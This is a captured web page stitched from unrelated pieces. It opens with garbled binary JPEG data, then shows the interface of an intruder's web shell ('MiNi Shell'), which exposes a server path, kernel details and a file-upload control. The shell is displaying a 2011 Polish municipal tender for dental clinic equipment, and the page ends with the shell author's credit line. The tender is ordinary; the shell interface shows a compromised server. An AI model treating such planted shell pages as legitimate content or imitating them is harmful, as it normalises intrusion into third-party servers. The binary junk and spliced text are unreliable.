JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110506/131219-N-2011.html

<p class="kh_header"><b>Stara Kiszewa: Dostawa wraz z montażem wyposażenia do gabinetu stomatologicznego Gminnego Ośrodka Zdrowia w Starej Kiszewie</b><br>
<b>Numer ogłoszenia: 131219 - 2011; data zamieszczenia: 06.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stara Kiszewa , ul. Ogrodowa 1, 83-430 Stara Kiszewa, woj. pomorskie, tel. 058 6876020, 6876024.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starakiszewa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem wyposażenia do gabinetu stomatologicznego Gminnego Ośrodka Zdrowia w Starej Kiszewie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wraz z montażem wyposażenia do gabinetu stomatologicznego Gminnego Ośrodka Zdrowia w Starej Kiszewie, w następującym asortymencie:

Unit stomatologiczny
1.System higieny umożliwiający ciągłe przepłukiwanie filtrów ssaka i ślinociąguw trakcie pracy urządzeń.
2. Duplikowanie podstawowych funkcji na panelu, umożliwiające jednoczesna pracę lekarza i asysty.
3. Pulpit lekarza wyposażony w panel dotykowy oraz min 5 instrumentów:
- Skaler podświetlany w systemie EMS lub równoważnym
- Turbina ze światłem LED + spray + szybkozłączka
- Mikrosilnik bezszczotkowy zintegrowany z kątnicą przyspieszającą  ze światłem LED, spray
- Dmuchawka 3 funkcyjna do sterylizacji (woda, spray, powietrze)
- Jeden rękaw wolny turbinowy ze złączem typu MIDWEST (dla urządzeń dodatkowych)
  4. Pulpit asysty wyposażony w panel dotykowy umożliwiający sterowanie wszystkimi funkcjami fotela i instrumentów oraz wyposażony w min 3 instrumenty
- Ślinociąg
- Ssak
- Dmuchawkę 3 funkcyjną

5. Negatoskop
6. Kontrola obrotów mikrosilnika, regulacja wody i sprayu w końcówkach
7.Włączanie i wyłączanie powietrza do mikrosilniku
8. Parametry minimalne turbin: głośność max. 58dB, moc min. 19 Wat
9. Górny montaż rękawów
10.Kamera zewnątrzustna +ramię
11.Możliwość zastosowania szybkozłączki
12.Wielofunkcyjny sterownik nożny umożliwiający regulację pracy urządzeń stomatologicznych  oraz położenia fotela
13. Monitor do przeglądania zdjęć z RTG i kamery zewnątrzustnej o przekątnej 17, zasilany bezpiecznym zasilaniem
14. Możliwość demontażu uchwytów na instrumenty oraz elementów bloku spluwaczki w celu dezynfekcji
15. Zintegrowane wsparcie dla lędźwiowej części kręgosłupa oraz możliwość regulacji odległości siedziska od oparcia
16. Możliwość podłączenia kątnicy przyspieszającej

Blok higieniczny
1. misa porcelanowa
2. panel asysty (ssak, ślinociąg, dmuchawka)
3. napełnianie kubka
4. spłukiwanie misy
5.sterowanie fotelem z panelu asysty
6.system zasilania instrumentów  stomatologicznych wodą destylowaną  zabudowany min 1,5L 
7. niewidoczna butla

Fotel pacjenta
1. Min. 4 pozycje do indywidualnego zaprogramowania
2. Pozycja 0 
3. Łamany zagłówek chirurgiczny z blokami przegubów 
4. Sterowanie fotelem z panelu asysty
5. tapicerka bezszwowa
6.. Foliowa podkładka pod nogi pacjenta
7. Elektryczny
8.Lewy podłokietnik

Lampa polimeryzacyjna
1. bezprzewodowa
2. dioda LED w główce lampy
3. długość fali min. 450-500nm
4. czas polimeryzacji 5-10s
5.Światło o mocy min 1000mW na cm2
6. ładowarka
7. akumulator litowo jonowy

Stomatologiczna kolumna montażowa
1. Pełna kompatybilność z unitem opisanym powyżej 
2. Mocowanie podłogowe i sufitowe
3. Stabilna konstrukcja
4. Możliwość modyfikacji, rozbudowy konfiguracji kolumny bez konieczności jej demontażu

Szybkozłączka
1.Wszystkie instrumenty zakupionych unitów powinny pasować do jednego typu szybkozłączek , co oznacza dla  lekarza wygodę w pracy różnymi instrumentami w zależności od wskazań klinicznych, oraz możliwość dowolnego rozbudowywania wyposażenia  praktyki w końcówki
2. Złącza powinny umożliwiać obrót instrumentów o 360 stopni
3. Szybkozłączka  powinna pozwalać na podłączenie min. do:
- Wszystkich turbin
- Skalera do usuwania złogów nazębnych
- Piaskarki do profesjonalnego oczyszczania zębów
- Urządzenia do usuwania prac protetycznych  w ustach pacjenta (korony, mosty, prace tymczasowe)

Krzesło stomatologiczne dla lekarza i asysty
1. Anatomicznie ukształtowane siedzenie i oparcie 
2. Mechanizm synchronicznej regulacji  siedziska i oparcia
3. Regulowane oparcie: dostosowywanie się oparcia do różnych konturów ciała , możliwość regulacji w pionie 
4.Efektywne podparcie części lędźwiowej  kręgosłupa
5. Regulacja nachylenia siedziska
6. Możliwość regulacji wysokości siedziska za pomocą sterownika nożnego

Stomatologiczna pompa ssąca 
1. Pompa ssąca systemu suchego
2. Pompa przeznaczona do pracy  na min. 1 stanowisku roboczym
3. Zgodność pompy z unitem opisanym wyżej
4. Moc min 1,5 kW
5. Głośność max. 65dB

Kompresor stomatologiczny z osuszaczem membranowym
1. kompresor systemu suchego
2. jeden kompresor przeznaczony do pracy dla min 2 foteli stom.
3. zatosowanie rozwiązania bezolejowego minimalizującego potrzeby konserwacyjne tylko do wymiany filtrów
4. okres wymiany filtrów nie częściej niż 1 raz na rok
5. wyposażenie dodatkowe w osuszacz 
6. pojemność 15-30L
7. Wydajność min 130L na min.
8. Ciśnienie  min 5bar
9. Głośność max 70dB
10. zgodność kompresora z unitami opisanymi powyżej 

Aparat do radiografii cyfrowej
1.rozdzielczość obrazu min 25 par linii/milimetr
2.ergonomiczny kształt czujnika zgodny z anatomią jamy ustnej
3. spełniający wymogi bezpieczeństwa Class II Medical Device
4.niska dawka promieniowania  dzięki krótkim czasom naświetlania (poniżej 80ms)
5.trwałość czujnika min 2 lata
6. zgodność czujnika z łączem USB 2
7. rentgen punktowy o następujących parametrach:
- Rozmiar ogniska max 0,4mm
- Wysięg min 180cm
- Dodatkowy panel sterujący w głowicy umożliwiający  kontrolę parametrów ekspozycji podczas pozycjonowania pacjenta
- Możliwość montażu na kolumnie montażowej opisanej powyżej

Autoklaw
1. pojemność komory min 18L
2. ciężar urządzenia  50kg
3. poziom hałasu niższy niż 70dB
4. maksymalna moc 2000W
5. Bezwzględne max ciśnienie do 330kPa
6. zużycie wody na cykl min 250cm3 , max 800cm3
7.system automatycznego wyłączania
8. wbudowana drukarka
9. duży graficzny wyświetlacz LCD
10. serwis
11. instrukcja obsługi w języku polskim

Destylator do wody
1. powietrzny system chłodzenia
2.pojemność zbiornika na wode min 4 L
3. automatyczny wyłącznik po zakończonej pracy
4. łącznik
5.kabel zasilający
Zgrzewarka
1. możliwość powieszenia na ścianie
2. szerokość zgrzewa min 12mm
3. obcinarka
4. max szerokość rękawa 310mm.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.24.00-6, 33.12.60.00-9, 33.13.00.00-0, 33.19.00.00-8, 33.13.11.52-7, 33.11.15.00-6, 33.13.10.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie Wykonawcy o oferowaniu w złożonej ofercie jedynie urządzeń dopuszczonych do obrotu na terytorium Rzeczpospolitej Polskiej, w tym wszystkich medycznych, zgodnie z przepisami ustawy z dnia 20 kwietnia 2004 r o wyrobach medycznych (Dz. U. z 2004 r., nr 93, poz. 896 ze zm.), oraz o przedłożeniu na żądanie Zamawiającego (w razie wyboru oferty Wykonawcy) wpisu lub zgłoszenia do rejestru wyrobów medycznych dla urządzeń klasy II b lub wyższej albo CE lub deklaracji zgodności ze znakiem CE wystawionej przez producenta dla urządzeń klasy niższej niż II b, a dla produktu wprowadzanego po raz pierwszy na rynek polski - znaków CE i deklaracji zgodności ze znakiem CE (zgodnie z przepisami ustawy o wyrobach medycznych) - na formularzu zgodnym z treścią załącznika nr 4 do SIWZ</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany postanowień zawartej umowy  w przypadku:
a) konieczności zmiany terminu realizacji umowy, w przypadku wystąpienia tzw. siły wyższej, tj. przez siłę wyższą należy rozumieć zdarzenie bądź połączenie zdarzeń obiektywnie niezależnych od Wykonawcy i Zamawiającego, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których Wykonawca i Zamawiający nie mogli przewidzieć i którym nie mogli zapobiec, ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla stosunków zobowiązaniowych. Wykonawca jest zobowiązany niezwłocznie poinformować w formie pisemnej Zamawiającego o fakcie wystąpienia siły wyższej, udowodnić te okoliczności poprzez przedstawienie dokumentacji potwierdzającej wystąpienie zdarzeń mających cechy siły wyższej oraz wskazać zakres i wpływ, jakie zdarzenie to miało na 
przebieg realizacji zamówienia
b) z przyczyn leżących po stronie Zamawiającego, wynikających ze zmiany stosunków społeczno gospodarczych lub z innych powodów wystąpi konieczność zmiany terminu, zakresu, bądź innych zapisów, bez zmiany których realizacja umowy będzie utrudniona, niemożliwa lub narazi Zamawiającego na szkodę,
c) zmiany danych osobowych i zmiany osób tj. przedstawicieli Wykonawcy wymienionych w treści umowy,
d) zmiany danych teleadresowych, zmiana danych związanych z obsługą administracyjną umowy np. zmiana rachunku bankowego,
e)zmiana postanowień niniejszej umowy na skutek zmiany powszechnie obowiązującego prawa,
f) z powodu uzasadnionych zamian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zamawiającego,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.starakiszewa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Starej Kiszewie, ul. Ogrodowa 1, 83-430 Stara Kiszewa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2011 godzina 10:00, miejsce: Urząd Gminy w Starej Kiszewie, ul. Ogrodowa 1, 83-430 Stara Kiszewa, sekretariat - pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com